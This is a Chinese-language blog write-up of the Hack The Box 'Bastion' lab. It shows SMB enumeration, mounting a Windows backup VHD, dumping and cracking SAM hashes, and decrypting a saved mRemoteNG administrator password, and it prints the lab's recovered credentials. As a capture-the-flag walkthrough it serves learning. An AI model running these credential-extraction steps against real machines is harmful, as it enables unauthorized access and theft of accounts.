Hack The Box — Bastion Write up

今天分享一個可以練習mount和SMB相關指令的題目Bastion

尋找User之路

首先使用NMAP掃描

nmap -sV -T4 -O -F — version-light 10.10.10.134

-F 加快掃描

-sV需要各種服務

smbmap -L 10.10.10.134

smbclient //連線SMB伺服器的工具

指令格式:smbclient –L [SMB伺服器IP] [參數]

-p:指定連線port number

-U 使用者名稱:指定使用者名稱

-L List all drives on the specified host

帳號可使用 Guest

我們發現 使用Guest 密碼空白就可以access

Windows 這邊指令我很不熟 所以看了很多教學

參考如下:

使用cd時候最後要列出Backup 2019–02–22 12351內的檔案

最後指令資料夾路徑要加入” ” (括號)

我在這邊卡的時間蠻長的

smb: \WindowsImageBackup\L4mpje-PC\> cd “Backup 2019–02–22 124351”

發現是vhd , 於Linux下使用mount 將檔案下載下來(惡夢開始)

因為Mount 不常使用 所以不熟 也看了很多資料 如下:

https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

指令:

mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC ~/Desktop/mount -o user=anonymous

輸入完後會顯示:

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC:

不過這時候我一直沒有處理得很好 ,所以先回到Windows上面。

讓10.10.10.134的路徑加到我的網路位置:

把SAM和SYSTE複製出來後掛載VHD解這兩個檔案,除了檔案很肥以外我還解不出答案來,後來回去找了Kali上方式..

Mounting the Backup Image, Dumping Credentials, User FlagThese vhd images are the system backup files. As the note said, trying to download them will take a very long time and probably won’t finish because of their big size, so instead we will mount them, I wanted to look at 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd first. This was helpful.

用Mount指令 不用整個把檔案載下來

(當時Windows下我解不出來檔案的數值, 後來我回想應該是我指令下錯 )
所以上面浪費了一點時間XD 回到Kali上

Kali

先mount上檔案:

root@kali:~# mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC:

root@kali:~# qemu-nbd -r -c /dev/nbd0 “/mnt/L4mpje-PC/Backup 2019–02–22 124351/9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd”

root@kali:~# mount -r /dev/nbd0p1 /mnt/vhd

root@kali:~# cd /mnt/vhd

接下來要找到SAM和SYSTEM的檔案放置處

在System32/Config 下

samdump2 SYSTEM SAM

Windows格式是Ntlm 上網找網站去反解得到:

26112010952d963c8dc4217daec986d9

接下來連線回去主機登入

Kali內用ssh連線

L4mpje@10.10.10.134 密碼是解出來的bureaulampje

在桌面 把檔案用type找出來

9bXXXXXXXXXXXXXXXXXXcd

我試著輸入root

沒有結果

回hack the box 輸入解答

得到分數

尋找Root:

C:\Users\L4mpje\AppData\Roaming

這邊可以知道Windows下有安裝甚麼東西

發現了一個可以遠端的程式 mRemoteNG

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
It allows you to view all of your remote connections in a simple yet powerful tabbed interface. -mremoteng.org

找到該資料夾下的confCons.xml

將檔案下載下來 最後一個.是當前目錄

scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

我用nano打開confCons.xml

找到Admin 後面的password

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

丟base 64 decode解不開

上網查一下 他有先處理過才base64

使用這套工具來解

https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py

python3 NG.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

密碼為 :

thXLHM96BeKL0ER2

接著SSH登入

Administrator@10.10.10.134thXLHM96BeKL0ER2

解出來為

95XXXXXXXXXXXXXXXXXXXXXc8

拋回去解Own Root!拿到分數囉


若您喜歡我的文章,歡迎按下「拍手」與Liker按讚給我支持並轉發給你的朋友們(可以多拍幾下手喔),或是「Follow」我,讓我提供更多優質文章給您。

另外可以加入我的LinkedIn 希望認識各位閱讀者

加入後歡迎跟我打招呼認識一下 我每年都會參加社群

例如HITCON或COSCUP 樂意認親

--

--

--

業餘資安寫手,成員來自於四大會計師事務所、不同類型的資安與科技公司,希望透過紀錄所學的知識來回饋於社群上,互相學習分享。另提供企業資安顧問服務,依照企業規模與需求評估企業網路安全設計、基礎資訊安全防禦規劃。contact@kuronetwork.me

Recommended from Medium

Top 5 Wifi Hacking software for Linux OS Loved by every hacker in the world

Week in OSINT #2018–24

As a new business model, personal data locker has its own significance in the digital age.

Sunshine is good. SUNBURST is not.

SCOMplicated? — Decrypting SCOM “RunAs” credentials

5 Things Everyone Gets Wrong About Quantum Encryption

{UPDATE} Money Machine Hack Free Resources Generator

DXER ham radio news 11/15/18

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kuro Huang

Kuro Huang

充滿熱情的資安從業者,喜歡用專業興趣交朋友而非透過商業關係建立友誼。目前於安永 ( EY ) 擔任資訊安全顧問,希望對資安社群盡一點心力,並期望自己與身旁的人能有所進步,歡迎喝咖啡聊資安。希望保持著定期參與資安社群活動。 LinkedIn好友、文章目錄與個人介紹請參考 :https://kuronetwork.me

More from Medium

[Hack The Box] Forge— Walkthrough

OWASP Top 10 — What Do They Mean?

OSINT tweets liked by @aqfiazfan in Jan — Des 2021

[Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)